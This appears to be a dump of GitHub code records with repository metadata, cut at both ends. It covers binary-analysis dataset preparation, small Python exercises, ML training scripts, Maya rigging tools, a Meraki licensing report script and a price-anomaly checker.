type_str:\n return 'unsigned int'\n return 'signed int'\n elif 'longlong' in type_str:\n if 'u' in type_str:\n return 'unsigned long long'\n return 'signed long long'\n elif 'long' in type_str:\n if 'u' in type_str:\n return 'unsigned long'\n return 'signed long'\n\n elif 'undefined' in type_str:\n return 'undefined'\n\n print(type_str)\n return '?you shouldnt be seeing this?'\n\n\ndef test_hex(s):\n try: \n int(s)\n return True\n except ValueError:\n return False\n\n\ndef get_reg(tokens):\n if tokens[-1] == ']' or test_hex(tokens[-1]):\n register = tokens[1].upper()\n else:\n register = tokens[-1].upper()\n return register\n\n\n# gets the type of an instruction that has a stack xref\ndef get_ds_loc(loc_dict, address, funcname):\n for var in loc_dict[funcname]:\n if address in [int(i, 16) for i in loc_dict[funcname][var]['addresses']]:\n return get_type(loc_dict[funcname][var]['type'], loc_dict[funcname][var]['agg'])\n return 'no-access'\n\n\n# gets the type of an argument using the register name where it's stored\ndef get_arg_stack_loc(loc_dict, register, funcname):\n for var in loc_dict[funcname]:\n if ('register' in loc_dict[funcname][var] \n and register == loc_dict[funcname][var]['register']):\n return get_type(loc_dict[funcname][var]['type'], loc_dict[funcname][var]['agg'])\n return 'undefined'\n\n\n# gets overall argument info for each function\ndef get_arg_info(loc_dict, funcname):\n arg_list = []\n for var in loc_dict[funcname]:\n if 'register' in loc_dict[funcname][var].keys():\n arg_list.append((loc_dict[funcname][var]['count'], get_type(loc_dict[funcname][var]['type'], loc_dict[funcname][var]['agg'])))\n arg_list.sort()\n leng = str(len(arg_list))\n\n while len(arg_list) < 3:\n arg_list.append('##')\n arg_list = [arg_type for (order, arg_type) in arg_list]\n\n return [leng] + arg_list[:3]\n\n\ndef hex2str(s, b_len=8):\n num = s.replace('0x', '')\n\n # handle 64-bit cases, we choose the lower 4 bytes, thus 8 numbers\n if len(num) > b_len:\n num = num[-b_len:]\n\n num = '0' * (b_len - len(num)) + num\n return num\n\n\ndef byte2seq(value_list):\n return [value_list[i:i + 2] for i in range(len(value_list) - 2)]\n\n\nparser = 
argparse.ArgumentParser(description='Output ground truth')\nparser.add_argument('--output_dir', type=str, nargs=1,\n help='where ground truth is output')\nparser.add_argument('--input_dir', type=str, nargs=1,\n help='directory where input binaries are')\nparser.add_argument('--stack_dir', type=str, nargs=1,\n help='where the stack files are (same as argument for get_var_loc.py')\nparser.add_argument('--arch', type=str, nargs=1,\n help='architecture of binary')\n\nargs = parser.parse_args()\n\noutput_dir = args.output_dir[0]\ninput_dir = args.input_dir[0]\nstack_dir = args.stack_dir[0]\n\nif not os.path.exists(output_dir):\n os.makedirs(output_dir)\n\ntrain_file = {field: open(os.path.join(output_dir, f'train.{field}'), 'w') for field in params.fields}\nvalid_file = {field: open(os.path.join(output_dir, f'valid.{field}'), 'w') for field in params.fields}\n\ntrain_label = open(os.path.join(output_dir, 'train.label'), 'w')\nvalid_label = open(os.path.join(output_dir, 'valid.label'), 'w')\n\nfile_list = glob.glob(os.path.join(input_dir, '*'), recursive=True)\n# filename = 'command/ghidra/ds_test_dwarf'\n\nfor filename in file_list:\n # load data structure information from ghidra\n with open(os.path.join(stack_dir, f'{os.path.basename(filename)}_stacks'), 'r') as f:\n loc_dict = json.loads(f.read())\n\n with open(filename, 'rb') as f:\n elffile = ELFFile(f)\n dwarf = elffile.get_dwarf_info()\n\n # disassemble the byte code with capstone\n code = elffile.get_section_by_name('.text')\n opcodes = code.data()\n addr = code['sh_addr']\n md = Cs(CS_ARCH_X86, CS_MODE_64)\n\n for CU in dwarf.iter_CUs():\n function_reps = get_function_reps(CU.get_top_DIE(), None)\n\n for func in function_reps:\n start_addr = func['start_addr']\n end_addr = func['end_addr']\n\n func_args = {}\n used_regs = set()\n\n # input\n static = []\n inst_pos = []\n op_pos = []\n arch = []\n byte1 = []\n byte2 = []\n byte3 = []\n byte4 = []\n\n # output\n labels = []\n\n inst_pos_counter = 0\n\n try:\n for address, size, op_code, op_str in md.disasm_lite(opcodes, addr):\n\n if start_addr <= address < end_addr:\n tokens = tokenize(f'{op_code} {op_str}')\n label = get_ds_loc(loc_dict, address, func['name'])\n\n # get the register and stack location for likely arg vars from the \n # op_str and label the instruction by using the register->param type\n # mapping from Ghidra. 
A mapping of stack location -> type is stored\n # for whenever else the location is seen.\n if label == 'undefined' and '[' in tokens and op_code == 'mov':\n reg = get_reg(tokens)\n\n loc = op_str[op_str.find(\"[\")+1:op_str.find(\"]\")]\n if loc in func_args:\n label = func_args[loc]\n\n else:\n label = get_arg_stack_loc(loc_dict, reg, func['name'])\n func_args[loc] = label\n\n for i, token in enumerate(tokens):\n if '0x' in token.lower():\n static.append('hexvar')\n bytes = byte2seq(hex2str(token.lower()))\n byte1.append(bytes[0])\n byte2.append(bytes[1])\n byte3.append(bytes[2])\n byte4.append(bytes[3])\n\n elif token.lower().isdigit():\n static.append('num')\n bytes = byte2seq(hex2str(hex(int(token.lower()))))\n byte1.append(bytes[0])\n byte2.append(bytes[1])\n byte3.append(bytes[2])\n byte4.append(bytes[3])\n \n else:\n static.append(token)\n byte1.append('##')\n byte2.append('##')\n byte3.append('##')\n byte4.append('##')\n\n inst_pos.append(str(inst_pos_counter))\n op_pos.append(str(i))\n arch.append(args.arch[0])\n\n labels.append(label)\n\n inst_pos_counter += 1\n\n # print(str(address) + \"\\t\"+ label+ \"\\t\"+ op_code + \"\\t\"+ op_str )\n\n except CsError as e:\n print(\"ERROR: %s\" % e)\n\n\n arg_info = get_arg_info(loc_dict, func['name'])\n\n # skip invalid functions\n if len(labels) < 30 or len(labels) > 510 or len(set(labels)) == 1:\n continue\n\n if not random.random() < 0.1:\n train_file[params.fields[0]].write(' '.join(static) + '\\n')\n train_file[params.fields[1]].write(' '.join(inst_pos) + '\\n')\n train_file[params.fields[2]].write(' '.join(op_pos) + '\\n')\n train_file[params.fields[3]].write(' '.join(arch) + '\\n')\n train_file[params.fields[4]].write(' '.join(byte1) + '\\n')\n train_file[params.fields[5]].write(' '.join(byte2) + '\\n')\n train_file[params.fields[6]].write(' '.join(byte3) + '\\n')\n train_file[params.fields[7]].write(' '.join(byte4) + '\\n')\n train_file[params.fields[8]].write(' '.join(arg_info) + '\\n')\n\n train_label.write(' '.join(labels) + '\\n')\n\n\n else:\n valid_file[params.fields[0]].write(' '.join(static) + '\\n')\n valid_file[params.fields[1]].write(' '.join(inst_pos) + '\\n')\n valid_file[params.fields[2]].write(' '.join(op_pos) + '\\n')\n valid_file[params.fields[3]].write(' '.join(arch) + '\\n')\n valid_file[params.fields[4]].write(' '.join(byte1) + '\\n')\n valid_file[params.fields[5]].write(' '.join(byte2) + '\\n')\n valid_file[params.fields[6]].write(' '.join(byte3) + '\\n')\n valid_file[params.fields[7]].write(' '.join(byte4) + '\\n')\n valid_file[params.fields[8]].write(' '.join(arg_info) + '\\n')\n\n valid_label.write(' '.join(labels) + '\\n')\n\nfor k in train_file:\n train_file[k].close()\nfor k in valid_file:\n valid_file[k].close()\ntrain_label.close()\nvalid_label.close()\n","repo_name":"CUMLSec/stateformer","sub_path":"command/finetune/prepare_finetune_complete.py","file_name":"prepare_finetune_complete.py","file_ext":"py","file_size_in_byte":11910,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"29"} +{"seq_id":"21767892205","text":"#!/usr/bin/python3\nimport os\nimport time\n\nr, w = os.pipe()\n\npid = os.fork()\n\nif pid:\n print(\"I'm processsss: \", os.getpid(), \" and my father is: \", os.getppid())\n os.close(w)\n r = os.fdopen(r)\n print('P: leyendo')\n string = r.readline()\n print('P text = ', string)\n os.wait()\n exit()\nelse:\n print(\"I'm process: \", os.getpid(), \" and my father is: \", os.getppid())\n os.close(r)\n w = os.fdopen(w, 'w')\n print('H: 
writing ')\n    w.write('Text written by the child\\n')\n    w.close()\n    print('H: child closed')\n    exit()\n","repo_name":"fisaguirre/UM-Computacion2-2023","sub_path":"Clases/clase-5-FIFO/ejemplos/ejemplo2.py","file_name":"ejemplo2.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"40135586041","text":"class Solution:\n    def twoSum(self, nums: List[int], target: int) -> List[int]:\n        map = {}\n        res = []\n        for i in range(len(nums)):\n            diff = target - nums[i]\n            if nums[i] not in map:\n                map[diff] = i\n            else:\n                res.append(map[nums[i]])\n                res.append(i)\n\n        return res","repo_name":"sumeetparekh94/Leetcode_Questions","sub_path":"two_sum_1.py","file_name":"two_sum_1.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"15476401770","text":"\"\"\"Some useful functions.\"\"\"\n\nimport os\nimport time\nimport shutil\n\n\nclass Timer:\n    \"\"\"Timer. Use get() method to get how much time has passed since this\n    object creation.\"\"\"\n\n    def __init__(self):\n        self.time = time.clock()\n\n    def get(self):\n        \"\"\"Returns how much time has passed since this object creation.\"\"\"\n        return round(time.clock() - self.time, 2)\n\n\ndef copytree(source, destination):\n    \"\"\"Same as shutil.copytree(), but can copy to already existing directory.\"\"\"\n\n    if not os.path.exists(destination):\n        os.makedirs(destination)\n\n    for item in os.listdir(source):\n        s = os.path.join(source, item)\n        d = os.path.join(destination, item)\n\n        if os.path.isdir(s):\n            shutil.copytree(s, d)\n        else:\n            shutil.copy2(s, d)","repo_name":"lecnim/stado","sub_path":"stado/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"29"} +{"seq_id":"1600101335","text":"from sklearn.model_selection import train_test_split\nimport numpy as np\nimport pandas as pd\nimport math\nfrom sklearn.preprocessing import MinMaxScaler\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom helpers.DataframeHelper import DataframeHelper\n\nclass DataProcessing(object):\n\n    @staticmethod\n    def run_complete_pipeline_transformations(data_csv, is_training):\n        DataProcessing.describe_input_csv(data_csv)\n        DataProcessing.transform_csv_preprocessing(data_csv, is_training)\n        DataProcessing.transform_csv_create_title(data_csv)\n        DataProcessing.transform_csv_generate_missing_age(data_csv)\n        DataProcessing.transform_csv_process_embarked(data_csv)\n        DataProcessing.transform_csv_categorical_values(data_csv)\n        DataProcessing.transform_csv_scale_to_one(data_csv)\n        csv_processed = DataProcessing.transform_csv_postprocess(data_csv)\n        DataProcessing.perform_visual_analysis(csv_processed)\n        return csv_processed\n\n    @staticmethod\n    def describe_input_csv(data):\n        print(data.describe(include='all'))\n        print(data.describe(include=['O']))\n        print(data.isnull().sum())\n        print('-----------------------------------------------------')\n\n    @staticmethod\n    def transform_csv_scale_to_one(data):\n        scaler = MinMaxScaler()\n        data['NameLength'] = scaler.fit_transform(data[['NameLength']])\n        data['Pclass'] = scaler.fit_transform(data[['Pclass']])\n        data['Fare'] = scaler.fit_transform(data[['Fare']])\n        data['Age'] = scaler.fit_transform(data[['Age']])\n        data['Title'] = scaler.fit_transform(data[['Title']])\n        data['Embarked'] = scaler.fit_transform(data[['Embarked']])\n\n    
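# Renames Survived to 'class' for training, encodes Sex/Embarked as integers, and derives FamilySize, IsAlone and NameLength.\n    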
@staticmethod\n def transform_csv_preprocessing(data, isTraining):\n if isTraining == True:\n data.rename(columns={'Survived': 'class'}, inplace=True) # tpot needs this as Y\n\n data['Sex'] = data['Sex'].map({'male': 0, 'female': 1})\n data['Embarked'] = data['Embarked'].map({'S': 0, 'C': 1, 'Q': 2})\n data['FamilySize'] = data['SibSp'] + data['Parch'] + 1\n data['IsAlone'] = 0\n data.loc[data['FamilySize'] == 1, 'IsAlone'] = 1\n data['NameLength'] = data['Name'].str.len()\n print('-----------------------------------------------------')\n\n @staticmethod\n def transform_csv_create_title(data):\n data['Title'] = data.Name.str.extract(' ([A-Za-z]+)\\.', expand=False)\n data['Title'] = data['Title'].replace(['Lady', 'Countess', 'Capt', 'Col', \\\n 'Don', 'Dr', 'Major', 'Rev', 'Sir', 'Jonkheer', 'Dona'], 'Rare')\n data['Title'] = data['Title'].replace('Mlle', 'Miss')\n data['Title'] = data['Title'].replace('Ms', 'Miss')\n data['Title'] = data['Title'].replace('Mme', 'Mrs')\n title_mapping = {\"Mr\": 1, \"Miss\": 2, \"Mrs\": 3, \"Master\": 4, \"Rare\": 5}\n data['Title'] = data['Title'].map(title_mapping)\n data['Title'] = data['Title'].fillna(0)\n\n @staticmethod\n def transform_csv_categorical_values(data):\n data['Fare'] = pd.cut(data['Fare'], [0,7.911,14.455,31.01,90000]).cat.codes\n data['Age'] = pd.cut(data['Age'], [0, 10, 18, 26, 36, 50, 65, 200]).cat.codes\n\n @staticmethod\n def transform_csv_generate_missing_age(data):\n for index, row in data.iterrows():\n if math.isnan(row['Age']):\n curr_title = data.at[index, 'Title']\n curr_pclass = data.at[index, 'Pclass']\n maching_group = data.loc[\n (data[\"Title\"] == curr_title) & (data[\"Pclass\"] == curr_pclass), \"Age\"]\n mean_age = maching_group.mean()\n std_age = maching_group.std()\n normal_guess = np.random.normal(mean_age, std_age)\n data.at[index, 'Age'] = normal_guess\n data['Age'] = data['Age'].astype(int)\n\n @staticmethod\n def transform_csv_process_embarked(data):\n freq_port = data.Embarked.dropna().mode()[0]\n data['Embarked'] = data['Embarked'].fillna(freq_port)\n data['Embarked'] = data['Embarked'].astype(int)\n\n @staticmethod\n def transform_csv_postprocess(data):\n return data.drop(['FamilySize','SibSp','Parch','Name','Ticket','Cabin','PassengerId'], axis=1)\n\n @staticmethod\n def get_test_and_validation(csv_processed):\n train, test = train_test_split(csv_processed, train_size=0.80, test_size=0.20)\n batch_size = 892\n train_ds = DataframeHelper.df_to_dataset(train, batch_size=batch_size)\n val_ds = DataframeHelper.df_to_dataset(test, batch_size=batch_size)\n return train_ds, val_ds\n\n @staticmethod\n def perform_visual_analysis(data):\n plt.figure(figsize=(30, 12))\n sns.heatmap(data.corr(), vmax=0.6, square=True, annot=True)\n plt.show()\n print('-----------------------------------------------------')\n","repo_name":"nekon1987/kaggle-titanic","sub_path":"helpers/DataProcessing.py","file_name":"DataProcessing.py","file_ext":"py","file_size_in_byte":4934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"16932697904","text":"import pymel.core as pmc\nimport maya.cmds as cmds\nfrom context_library import UndoOnError\nfrom nodes import ControlCurve\n\ndef build_fk_chain(targets, name='Unnamed'):\n with UndoOnError():\n previous_target = None\n controls = []\n for i, target in enumerate(targets):\n name = '_'.join([target.name(), 'CTRL'])\n ctrl = ControlCurve.create(name, 'circle')\n ctrl.rotateShape([0,0,90])\n ctrl.scaleShape([10,10,10])\n 
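# Align the new control to its target joint; FK chaining then parents it under the previous control and constrains the joint.\n            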
cmds.matchTransform(ctrl, target.name())\n if previous_target:\n pmc.parent(ctrl, previous_target)\n previous_target = ctrl\n ctrl.addBuffer()\n pmc.parentConstraint(ctrl, target, mo=True)\n controls.append(ctrl)\n return [controls[0].getTopBuffer()]\n\n\ndef build_ik_chain(targets, name='Unnamed'):\n with UndoOnError():\n\n start_joint = targets[0]\n pole_joint = targets[0].getChildren()[0]\n end_joint = targets[1]\n\n handle = pmc.ikHandle(sj=start_joint, ee=end_joint)[0]\n pmc.hide(handle)\n\n ik_ctrl = ControlCurve.create(name=name + '_Ik_CTRL', shapeType='circle')\n ik_ctrl.scaleShape([10,10,10])\n ik_ctrl.setTranslation(end_joint.getTranslation(worldSpace=True), worldSpace=True)\n ik_ctrl.addBuffer()\n ik_ctrl.lockTransform(scale=True, hide=True)\n pmc.orientConstraint(ik_ctrl, end_joint, mo=True)\n pmc.parent(handle, ik_ctrl)\n\n start_ctrl = ControlCurve.create(name=name + '_Base_CTRL', shapeType='circle')\n start_ctrl.scaleShape([10,10,10])\n start_ctrl.setMatrix(start_joint.getMatrix(worldSpace=True), worldSpace=True)\n start_ctrl.addBuffer()\n start_ctrl.lockTransform(rotate=True, scale=True, hide=True)\n pmc.parentConstraint(start_ctrl, start_joint, mo=True)\n\n pole_ctrl = ControlCurve.create(name=name + '_Pole_CTRL', shapeType='octohedron')\n pole_ctrl.scaleShape([10,10,10])\n pole_ctrl.setTranslation(pole_joint.getTranslation(worldSpace=True), worldSpace=True)\n pole_ctrl.addBuffer()\n pole_ctrl.lockTransform(rotate=True, scale=True, hide=True)\n pmc.poleVectorConstraint(pole_ctrl, handle)\n\n return ik_ctrl, pole_ctrl, start_ctrl\n\ndef build_quad_leg(targets, name='Unnamed'):\n with UndoOnError():\n assert len(targets) >= 2, 'Not enough valid targets for quad leg.'\n\n ik_ctrl, pole_ctrl, base_ctrl = build_ik_chain([targets[0], targets[2]], name)\n\n ik_ctrl.visibility.set(0)\n\n foot_ctrl = ControlCurve.create(name=name + '_Foot_CTRL', shapeType='cube')\n foot_ctrl.scaleShape([20,20,20])\n foot_ctrl.match(targets[-1].name(), rotation=False)\n foot_ctrl.lockTransform(scale=True, hide=True)\n foot_ctrl.addBuffer()\n\n hoc_ctrl = ControlCurve.create(name=name + '_Hoc_CTRL', shapeType='circle')\n hoc_ctrl.scaleShape([10,10,10])\n hoc_ctrl.lockTransform(translate=True, scale=True, hide=True)\n hoc_ctrl.rotateShape([0,0,90])\n hoc_ctrl.match(targets[-1].name())\n\n toe_ctrl = ControlCurve.create(name=name + '_Toe_CTRL', shapeType='circle')\n toe_ctrl.scaleShape([10, 10, 10])\n toe_ctrl.rotateShape([0,0,90])\n toe_ctrl.lockTransform(translate=True, scale=True, hide=True)\n toe_ctrl.match(targets[-1].name())\n\n pmc.parent([hoc_ctrl, toe_ctrl], foot_ctrl)\n hoc_ctrl.addBuffer()\n toe_ctrl.addBuffer()\n\n pmc.parentConstraint(hoc_ctrl, ik_ctrl, mo=True)\n pmc.parentConstraint(toe_ctrl, targets[-1], mo=True)\n\n return [ik_ctrl, pole_ctrl, base_ctrl, foot_ctrl]","repo_name":"obriencole11/mayalib","sub_path":"controls.py","file_name":"controls.py","file_ext":"py","file_size_in_byte":3656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"14142788538","text":"from habana_frameworks.tensorflow import load_habana_module\r\n# tensorflow.compact.v1.disable_eager_execution()\r\nload_habana_module()\r\n\r\nimport itertools\r\nimport os\r\nimport random\r\nfrom xml.etree.ElementInclude import include\r\n\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport PIL\r\nimport tensorflow\r\n\r\nfrom IPython.display import Image, display\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom 
sklearn.model_selection import train_test_split\r\n\r\nfrom tensorflow import keras\r\n# from tensorflow.keras import optimizers, Dense, Flatten, layers\r\n# from tensorflow.keras.optimizers import Adam\r\nfrom tensorflow.keras.layers import (Activation, BatchNormalization, Conv2D,\r\n Dense, Dropout, Flatten, MaxPooling2D,\r\n SeparableConv2D)\r\n# from tensorflow.keras.metrics import (categorical_crossentropy, \r\n# sparse_categorical_crossentropy)\r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\r\nfrom tensorflow.keras.applications.vgg16 import VGG16\r\nfrom tensorflow.keras.applications.vgg16 import preprocess_input\r\n\r\n\r\n# listing all local directories\r\nreal = \"Dataset/real_and_fake_face/training_real\"\r\nfake = \"Dataset/real_and_fake_face/training_fake\"\r\ndatadir = \"Dataset/real_and_fake_face\"\r\n\r\nreal_path = os.listdir(real)\r\nfake_path = os.listdir(fake)\r\n\r\ntraining_data = []\r\nIMG_SIZE = 224\r\n\r\n# Preprocessing for testing images\r\ndef load_img(path):\r\n image = cv2.imread(path)\r\n image = cv2.resize(image, (224, 224))\r\n return image[...,::-1]\r\n\r\n\r\ndef prepare(image):\r\n IMG_SIZE = 224\r\n new_array = cv2.resize(image, (IMG_SIZE, IMG_SIZE)) \r\n return new_array.reshape(-1, IMG_SIZE,IMG_SIZE,3)\r\n\r\n\r\ncategories = [\"training_real\", \"training_fake\"]\r\n\r\n# Correspondance: \r\n# 0 ——> Real (Original) Images\r\n# 1 ——> Fake (Photoshopped/Morphed) Images\r\n\r\ndef create_training_data():\r\n for category in categories:\r\n path = os.path.join(datadir, category)\r\n class_num = categories.index(category)\r\n for img in os.listdir(path):\r\n try:\r\n img_array = cv2.imread(os.path.join(path,img), cv2.IMREAD_UNCHANGED)\r\n new_array = cv2.resize(img_array,(IMG_SIZE,IMG_SIZE))\r\n training_data.append([new_array,class_num])\r\n except: pass\r\n\r\n\r\ncreate_training_data()\r\n\r\ntraining_data = np.array(training_data)\r\nprint(training_data.shape)\r\n\r\n# Randomizing the dataset\r\nnp.random.shuffle(training_data)\r\n\r\nX, y = [], []\r\n\r\nfor features,label in training_data:\r\n X.append(features)\r\n y.append(label)\r\n\r\nX = np.array(X).reshape(-1, IMG_SIZE, IMG_SIZE, 3)\r\ny = np.array(y)\r\n\r\nprint(X.shape)\r\nprint(y.shape)\r\nprint(np.unique(y, return_counts=True))\r\n# Expected Output: (array([0, 1]), array([1081, 960])) \r\n\r\nprint(y[1:10])\r\n\r\nX = X/255.0\r\n# Performing Normalization\r\n\r\n# Dataset split into training and validation groups\r\nX_train, X_test, y_train, y_test = train_test_split(\r\n X, y, test_size=0.1, random_state=42)\r\n\r\nprint(\"Shape of test_x: \", X_train.shape)\r\nprint(\"Shape of train_y: \", y_train.shape)\r\nprint(\"Shape of test_x: \", X_test.shape)\r\nprint(\"Shape of test_y: \", y_test.shape)\r\n\r\nprint(y_test[1:10])\r\nprint(np.unique(y_train, return_counts=True))\r\nprint(np.unique(y_test, return_counts=True))\r\n\r\ntrain_x = tensorflow.keras.utils.normalize(X_train, axis=1)\r\ntest_x = tensorflow.keras.utils.normalize(X_test, axis=1)\r\n\r\n# First Sequential Model\r\nmodel = tensorflow.keras.models.Sequential([\r\n tensorflow.keras.layers.Conv2D(filters=64, kernel_size=(3,3), \r\n padding=\"same\", activation='relu', input_shape= X.shape[1:]),\r\n tensorflow.keras.layers.Conv2D(filters=64, kernel_size=(3,3), \r\n padding=\"same\", activation='relu'),\r\n tensorflow.keras.layers.MaxPooling2D(pool_size=(2,2)),\r\n tensorflow.keras.layers.Conv2D(filters=64, kernel_size=(3,3), \r\n padding=\"same\", 
activation='relu'),\r\n tensorflow.keras.layers.Conv2D(filters=64, kernel_size=(3,3), \r\n padding=\"same\", activation='relu'),\r\n tensorflow.keras.layers.MaxPooling2D(pool_size=(2,2)),\r\n tensorflow.keras.layers.Dropout(0.25),\r\n tensorflow.keras.layers.Flatten(data_format=None),\r\n tensorflow.keras.layers.Dense(units=128, activation=tensorflow.nn.relu),\r\n tensorflow.keras.layers.Dense(units=2, activation=tensorflow.nn.softmax)\r\n])\r\n# Alternative for last layer try: model.add(Dense(units=1, activation='sigmoid'))\r\n\r\n# Customizing SGD Optimizer\r\nsgd = tensorflow.keras.optimizers.SGD(learning_rate=0.01, decay=1e-6, momentum=0.9, nesterov=True)\r\n\r\nmodel.compile(optimizer='adam',\r\n loss='sparse_categorical_crossentropy',\r\n metrics=['accuracy'])\r\n# Alternative for optimizer=sgd\r\n\r\nhist = model.fit(X_train,y_train, batch_size=20, epochs=8, validation_split=0.1)\r\n\r\nmodel.save('first_model.h5')\r\n\r\nval_loss, val_acc = model.evaluate(X_test, y_test)\r\nprint(val_loss)\r\nprint(val_acc)\r\n\r\n# Importing VGG-16 Model \r\nvgg16_model= tensorflow.keras.applications.vgg16.VGG16(\r\n include_top=True, \r\n weights='imagenet', \r\n input_tensor=None,\r\n input_shape=None, \r\n pooling=None, \r\n classes=1000,\r\n classifier_activation='softmax'\r\n)\r\n\r\nvgg16_model.summary()\r\nprint(type(vgg16_model))\r\n\r\n# VGG—16 is trained for classification of 1000 different classes, but that is not required.\r\n# Hence, we replace the last layer with one for a binary classifier.\r\n\r\n# Customizing the model\r\nmodel = Sequential()\r\n\r\nfor layer in vgg16_model.layers[:-1]: model.add(layer)\r\n# Replicating the vgg16_model, excluding the output layer, to a new Sequential model.\r\n\r\nfor layer in model.layers: layer.trainable = False\r\n# Iterating over each layer in our new Sequential model and setting them to be \r\n# non-trainable. 
This freezes the weights and other trainable parameters in each \r\n# layer so that they won't be updated when the fake and real face images are passed.\r\n\r\nmodel.add(Dense(units=2, activation='softmax'))\r\n# Alternative try: model.add(Dense(units=1, activation='sigmoid'))\r\n\r\n# Customizing SGD Optimizer\r\nsgd = tensorflow.keras.optimizers.SGD(learning_rate=0.01, decay=1e-6, momentum=0.9, nesterov=True)\r\n\r\nmodel.compile(optimizer='adam',\r\n loss='sparse_categorical_crossentropy',\r\n metrics=['accuracy'])\r\n# Alternative for optimizer=sgd\r\n\r\nhist = model.fit(X_train,y_train, batch_size=20, epochs = 50, validation_split=0.1)\r\n\r\nmodel.save('final_model.h5')\r\n# Download this model\r\n\r\nval_loss, val_acc = model.evaluate(X_test, y_test)\r\nprint(val_loss)\r\nprint(val_acc)\r\n# Final accuracy and loss\r\n","repo_name":"Saketspradhan/AWS-Deep-Learning-Challenge-2022","sub_path":"VGG16—training.py","file_name":"VGG16—training.py","file_ext":"py","file_size_in_byte":6829,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"7227320476","text":"'''\nMain script to gather organizations and their corresponding devices and\nlicencing status associated with expiration date\n'''\nimport os\nimport json\nimport logging\nimport sys\nimport time\nfrom dotenv import load_dotenv\nfrom prettytable import PrettyTable\nfrom mdutils.mdutils import MdUtils\nfrom meraki_functions import lic_date, table_svg, progress_bar, get_orgid_outputs\nfrom meraki_functions import iniciate_dashboard, get_licensing\n# defining logging system\n\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s [%(levelname)s] %(message)s\\n\",\n handlers=[\n logging.StreamHandler(sys.stdout)\n ]\n)\n# Defining your API key as a variable in source code is not recommended,\n# define a regular.env file to load variables\n\nlogging.info('Loading API_KEY to system.')\nload_dotenv()\nAPI_KEY = os.getenv('API_KEY')\nif not API_KEY:\n API_KEY = '6bec40cf957de430a6f1f2baa056b99a4fac9ea0' ### Meraki Always-On API KEY by default\n logging.warning(\"Using default Meraki Always-On API KEY, create .env file for private key.\")\n# Instead, use an environment variable as shown under the Usage section\n# @ https://github.com/meraki/dashboard-api-python/\n\n# Defining connectivity to Meraki (suppress logging since it works, Duh!)\n\ndashboard = iniciate_dashboard(API_KEY)\n\n# Gathering Org information list\nlogging.info('Gathering Organizations from Meraki via API')\nresponse = dashboard.organizations.getOrganizations()\n### MD File creation\nlogging.info('Initializing md file under outputs folder')\nmdFile = MdUtils(file_name='outputs/meraki_licensing.md')\nmdFile.new_header(level=1, title=\"Meraki Licensing Details\")\n\n### CLI pretty Table\npTable = PrettyTable()\npTable.field_names = [\"Org ID\",\n \"Client Name\",\n \"Licensing Status\",\n \"Expiration date\",\n \"licensed Devices\"]\n\n# Adapting each Org per row\ntotal_progress = len(response)\nlogging.info('Collecting licensing via API per %s company(ies)', total_progress)\n\nfor company in response:\n licensing = get_licensing(API_KEY,company[\"id\"])\n raw_equip = licensing[\"licensedDeviceCounts\"]\n equipments = json.dumps(raw_equip).replace(\",\", \"\\n\").replace(\"{\", \"\").replace(\"}\", \"\")\n pTable.add_row([company[\"id\"],\n company[\"name\"],\n licensing[\"status\"],\n lic_date(licensing[\"expirationDate\"]),\n equipments])\n company_title = f\"[{company['name']}]({company['url']})\"\n 
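# Emit this org's section to the Markdown report; the level-2 heading links to the org's dashboard URL.\n    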
mdFile.new_header(level=2, title=company_title)\n mdFile.new_line(\"- Expiration Date: \" + lic_date(licensing[\"expirationDate\"]))\n mdFile.new_header(level=3, title=\"Allowed Devices\")\n if licensing[\"licensedDeviceCounts\"] != \"N/A\":\n for device, count in licensing[\"licensedDeviceCounts\"].items():\n title = device + \": \" + str(count)\n mdFile.new_header(level=4, title=title)\n else:\n mdFile.new_header(level=4, title=licensing[\"licensedDeviceCounts\"])\n time.sleep(1)\n progress_bar(response.index(company), total_progress -1)\n\n# Structure the current Org table\n\npTable.align = \"r\"\npTable.sortby = \"Expiration date\"\npTable.hrules = True\n\n# Providing SVG file in the outputs folder\nlogging.info('Creating SVG file from collected data')\ntable_svg(pTable, \"fullTable_licensing\")\n\n# Providing markdown file in the outputs folder\nlogging.info('Creating md file from collected data')\nmdFile.create_md_file()\n\n# Providing html markmap file in the outputs folder\nlogging.info('Creating Markmap file from md file')\nos.system('markmap --no-open outputs/meraki_licensing.md --output outputs/licensing_MindMap.html')\n\n\n\n# Getting output files for specific OrgID\nwhile True:\n desired_OrgID = input(\"\\n >>>> Please, select desired \\\nOrg ID to create files from table above: \")\n print('\\n')\n logging.info('Creating .md , SVG and markmap file for requested Org ID: %s', desired_OrgID)\n get_orgid_outputs(dashboard, desired_OrgID)\n logging.info('Created .md , SVG and markmap file for requested Org ID: %s.', desired_OrgID)\n selection = input('\\n >>>> Would you like to continue \\\nwith another Org ID SVG creation? [yes|no]: ')\n if selection.lower() == 'yes':\n continue\n break\n","repo_name":"AngelIV23/Meraki-To-MindMaps","sub_path":"meraki_api_main.py","file_name":"meraki_api_main.py","file_ext":"py","file_size_in_byte":4237,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"6949346565","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport json\n\n\ndef find_price_anomalies(results):\n '''Loop through results found by matching.py to find\n product with bad matches based on large price differences\n among the matched listings.\n\n Params:\n results (list): list of dictionaries containing all matches found.\n\n Returns:\n suspect_products (list): List of products that may have bad matches.\n '''\n suspect_products = []\n price_delta = 200.0\n\n for result in results:\n listings = result['listings']\n if len(listings) > 1:\n prices = [\n round(float(listing['price']), 2) for listing in listings\n 